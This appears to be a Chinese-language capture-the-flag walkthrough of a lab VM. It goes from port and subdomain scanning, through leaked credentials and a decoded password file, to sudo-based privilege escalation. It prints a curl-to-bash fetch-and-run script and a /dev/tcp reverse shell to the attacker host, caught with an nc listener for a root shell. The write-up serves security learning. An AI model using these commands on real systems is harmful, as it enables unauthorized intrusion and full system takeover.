一、信息收集
先扫描
Administrator on ~/Desktop
# ipconfig
Windows IP 配置
未知适配器 OpenVPN Wintun:
媒体状态 . . . . . . . . . . . . : 媒体已断开连接
连接特定的 DNS 后缀 . . . . . . . :
以太网适配器 Ethernet1:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::e7f5:3c67:3a01:9c17%5
IPv4 地址 . . . . . . . . . . . . : 192.168.56.104
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . :
未知适配器 OpenVPN TAP-Windows6:
媒体状态 . . . . . . . . . . . . : 媒体已断开连接
连接特定的 DNS 后缀 . . . . . . . :
以太网适配器 蓝牙网络连接:
媒体状态 . . . . . . . . . . . . : 媒体已断开连接
连接特定的 DNS 后缀 . . . . . . . :
Administrator on ~/Desktop
# nmap -sP 192.168.56.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-08 09:46 中国标准时间
Nmap scan report for 192.168.56.1
Host is up (0.0056s latency).
MAC Address: 0A:00:27:00:00:0B (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.0020s latency).
MAC Address: 08:00:27:BF:4C:5B (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.103
Host is up (0.0010s latency).
MAC Address: 08:00:27:74:9B:DE (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.105
Host is up (0.0010s latency).
MAC Address: 00:0C:29:EB:98:6D (VMware)
Nmap scan report for 192.168.56.104
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.41 seconds
扫描出是192.168.56.105
进行端口扫描
Administrator on ~/Desktop
# nmap -A -p- 192.168.56.105
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-08 09:50 中国标准时间
Nmap scan report for 192.168.56.105
Host is up (0.0012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5f:cd:98:ac:0e:76:be:d0:9c:ae:23:47:8d:03:b5:07 (RSA)
| 256 f5:cb:de:f0:89:dc:ff:56:89:44:05:3c:a3:44:8f:70 (ECDSA)
|_ 256 3a:94:cc:9e:aa:ab:7d:64:71:26:49:48:02:07:62:30 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 00:0C:29:EB:98:6D (VMware)
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.15 ms 192.168.56.105
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.49 seconds
扫描出有22ssh和80http,系统是ubuntu
80页面为空,但是有一个网站域名
改一下host
192.168.56.105 bassam.ctf
cmd刷新一下dns
ipconfig /flushdns
能访问到网页
扫描域名,发现welcome.bassam.ctf(gobuster扫域名不好用,同样的字典扫不出来)
Administrator on ~/Desktop
# ffuf -c -u http://bassam.ctf/ -w D:\Global\apps\SecLists\2023.2\Discovery\DNS\subdomains-top1million-110000.txt -H "Host: FUZZ.bassam.ctf" -fs 21
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0
________________________________________________
:: Method : GET
:: URL : http://bassam.ctf/
:: Wordlist : FUZZ: D:\Global\apps\SecLists\2023.2\Discovery\DNS\subdomains-top1million-110000.txt
:: Header : Host: FUZZ.bassam.ctf
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response size: 21
________________________________________________
[Status: 200, Size: 38, Words: 4, Lines: 4, Duration: 13ms]ration: [0:00:01] :: Errors: 0 ::
* FUZZ: welcome
:: Progress: [114441/114441] :: Job [1/1] :: 293 req/sec :: Duration: [0:05:06] :: Errors: 0 :::
没什么用的提示,扫目录
Administrator on ~/Desktop
# gobuster dir -u http://welcome.bassam.ctf -w D:\Global\apps\dirbuster\1.0-RC1\directory-list-2.3-small.txt -x .zip,.
php,.txt,.html.php.bak
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://welcome.bassam.ctf
[+] Method: GET
[+] Threads: 10
[+] Wordlist: D:\Global\apps\dirbuster\1.0-RC1\directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: zip,php,txt,html.php.bak
[+] Timeout: 10s
===============================================================
2023/12/08 11:44:30 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 283]
/.html.php.bak (Status: 403) [Size: 283]
/index.php (Status: 200) [Size: 229]
/config.php (Status: 200) [Size: 0]
/.php (Status: 403) [Size: 283]
/.html.php.bak (Status: 403) [Size: 283]
Progress: 437506 / 438325 (99.81%)
===============================================================
2023/12/08 11:46:03 Finished
===============================================================
扫到两个,index.php和config.php,查看后发现后者直接访问为空,前者为一个下载文件的网页
输入config.php下载成功,查看
二、进入系统
发现账号密码,之前发现开启了ssh,尝试登录
Last login: Sun Dec 13 10:38:10 2020 from 192.168.162.128
$ id
uid=1002(test) gid=1002(test) groups=1002(test)
$ uname -a
Linux kira 4.15.0-128-generic #131-Ubuntu SMP Wed Dec 9 06:57:35 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
$ ls
$ pwd
/home/test
$ pwd
/home/test
$ ls
$ cd ..
$ ls
bassam kira test
$ ls -la
total 20
drwxr-xr-x 5 root root 4096 Dec 13 2020 .
drwxr-xr-x 25 root root 4096 Dec 13 2020 ..
drwxr-xr-x 2 bassam bassam 4096 Dec 13 2020 bassam
drwxr-xr-x 5 kira kira 4096 Dec 13 2020 kira
drwxr-xr-x 4 test test 4096 Dec 13 2020 test
$ cd bassam
$ ls
down.sh
$ cat down.sh
curl "http://mywebsite.test/script.sh" |bash
$ cd ..
$ cd kira
$ ls
test.sh
$ cat test.sh
echo 'your name'
read name
echo $name >/home/kali/message.txt
$1 2>/dev/null
查看权限,之后退到根目录发现一个PassProgram文件夹
$ sudo -l
[sudo] password for test:
Sorry, user test may not run sudo on kira.
$ cd PassProgram
$ pwd
/PassProgram
$ ls
decoder encoder
$ pwd
/PassProgram
$ cd ..
$ pwd
/
sudo不能执行在kira用户中
返回test文件夹,查看文件,发现隐藏文件夹历史bash,查看
$ cd test
$ ls -la
total 36
drwxr-xr-x 4 test test 4096 Dec 8 05:46 .
drwxr-xr-x 5 root root 4096 Dec 13 2020 ..
-rw------- 1 test test 34 Dec 13 2020 .bash_history
-rw-r--r-- 1 test test 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 test test 3771 Apr 4 2018 .bashrc
drwx------ 2 test test 4096 Dec 13 2020 .cache
drwx------ 3 test test 4096 Dec 13 2020 .gnupg
-rw-r--r-- 1 test test 807 Apr 4 2018 .profile
-rw------- 1 test test 722 Dec 8 05:46 .viminfo
$ cat .bash_history
ls
cat MySecretPassword
clear
ls
$
发现曾经查看过MySecretPassword文件,搜索
$ find / -type f -name "MySecretPassword"
find: ‘/run/lxcfs’: Permission denied
find: ‘/run/sudo’: Permission denied
find: ‘/run/cryptsetup’: Permission denied
find: ‘/run/lvm’: Permission denied
find: ‘/run/systemd/unit-root’: Permission denied
find: ‘/run/systemd/inaccessible’: Permission denied
find: ‘/run/lock/lvm’: Permission denied
find: ‘/root’: Permission denied
find: ‘/etc/ssl/private’: Permission denied
find: ‘/etc/polkit-1/localauthority’: Permission denied
find: ‘/home/kira/.cache’: Permission denied
find: ‘/home/kira/.gnupg’: Permission denied
find: ‘/home/kira/.local/share’: Permission denied
find: ‘/sys/kernel/debug’: Permission denied
find: ‘/sys/fs/pstore’: Permission denied
find: ‘/sys/fs/fuse/connections/49’: Permission denied
find: ‘/lost+found’: Permission denied
find: ‘/var/spool/rsyslog’: Permission denied
find: ‘/var/spool/cron/atspool’: Permission denied
find: ‘/var/spool/cron/crontabs’: Permission denied
find: ‘/var/spool/cron/atjobs’: Permission denied
/var/www/ctf/MySecretPassword
进入查看
$ cat MySecretPassword
$ file MySecretPassword
MySecretPassword: ASCII text
$ hexdump MySecretPassword
0000000 2020 2020 2020 2020 2020 2020 2020 2020
*
0000060 2020 2020 2020 2020 2020 0a20 2020 2020
0000070 2020 2020 2020 2020 2020 2020 2020 2020
*
00000d0 2020 2020 0a20 2020 2020 2020 2020 2020
00000e0 2020 2020 2020 2020 2020 2020 2020 2020
*
0000140 2020 2020 2020 2020 200a 2020 2020 2020
0000150 2020 2020 2020 2020 2020 2020 2020 2020
*
00001a0 2020 2020 2020 2020 2020 200a 2020 2020
00001b0 2020 2020 2020 2020 2020 2020 2020 2020
*
00001d0 2020 2020 2020 2020 2020 2020 0a20 2020
00001e0 2020 2020 2020 2020 2020 2020 2020 2020
*
0000200 2020 2020 2020 2020 2020 2020 2020 200a
0000210 2020 2020 2020 2020 2020 2020 2020 2020
*
0000230 2020 2020 2020 2020 2020 2020 2020 0a20
0000240 2020 2020 2020 2020 2020 2020 2020 2020
*
0000270 2020 0a20
0000274
查看后发现cat无法查看,但16进制的hexdump可以且有规律,可能是加密,之前发现了PassProgram中有decoder和encoder,可能为加密文件
$ ls -la
total 48
drwxr-xr-x 2 root root 4096 Dec 13 2020 .
drwxr-xr-x 25 root root 4096 Dec 13 2020 ..
-rwxr-xr-x 1 root root 16864 Dec 13 2020 decoder
-rwxr-xr-x 1 root root 16816 Dec 13 2020 encoder
$ ./decoder
Usage ./decoder <file to decode>
$ ./decoder /var/www/ctf/MySecretPassword
[*] Variables ready to go!
[*] File handled successfully!
[~] WORD: kira2003
[!] DONE
发现word为kira2003,可能为kira的密码
Administrator on ~/Desktop
# ssh kira@192.168.56.105
kira@192.168.56.105's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-128-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Dec 8 06:19:16 UTC 2023
System load: 0.0 Processes: 165
Usage of /: 21.3% of 19.56GB Users logged in: 1
Memory usage: 25% IP address for ens33: 192.168.56.105
Swap usage: 0%
258 packages can be updated.
198 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sun Dec 13 11:57:18 2020
kira@kira:~$
kira@kira:~$ sudo -l
[sudo] password for kira:
Matching Defaults entries for kira on kira:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User kira may run the following commands on kira:
(bassam) /home/kira/test.sh
kira@kira:~$ ls
test.sh
提权
kira@kira:~$ sudo -u bassam ./test.sh bash
your name
/home/kira/test.sh: 3: /home/kira/test.sh: cannot create /home/kali/message.txt: Directory nonexistent
ls
test.sh
id
uid=1001(bassam) gid=1001(bassam) groups=1001(bassam)
现在为bassam用户,继续寻找提权
cd bassam
ls
down.sh
sudo -l
Matching Defaults entries for bassam on kira:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User bassam may run the following commands on kira:
(root) NOPASSWD: /home/bassam/down.sh
sudo -u root ./down.sh bash
id
uid=1001(bassam) gid=1001(bassam) groups=1001(bassam)
cat down.sh
curl "http://mywebsite.test/script.sh" |bash
down.sh是通过curl下载文件并通过bash执行
cat hosts
127.0.0.1 localhost
127.0.1.1 kira
192.168.56.105 mywebsite.test
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
/etc/init.d/network restart
三、提权-root
直接sudo去执行down.sh,需要bassam的密码,但是sudo -l查看权限发现
User bassam may run the following commands on kira:
(root) NOPASSWD: /home/bassam/down.sh
sudo /home/bassam/down.sh
是不需要密码的
攻击机开启python的http服务,创建script.sh,输入whoami
./down.sh
bassam
sudo ./dowm.sh
[sudo] password for bassam:
[sudo] password for bassam:
sudo /home/bassam/down.sh
root
将script.sh内容改为
sh -i >& /dev/tcp/192.168.56.104/9001 0>&1
反弹shell
攻击机开启监听
nc -lvvp 9001
靶机执行 sudo /home/bassam/down.sh
Administrator on ~/Desktop
# nc -lvvp 9001
listening on [any] 9001 ...
connect to [192.168.56.104] from bassam.ctf [192.168.56.105] 44922: unknown socket error
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# ls
down.sh
#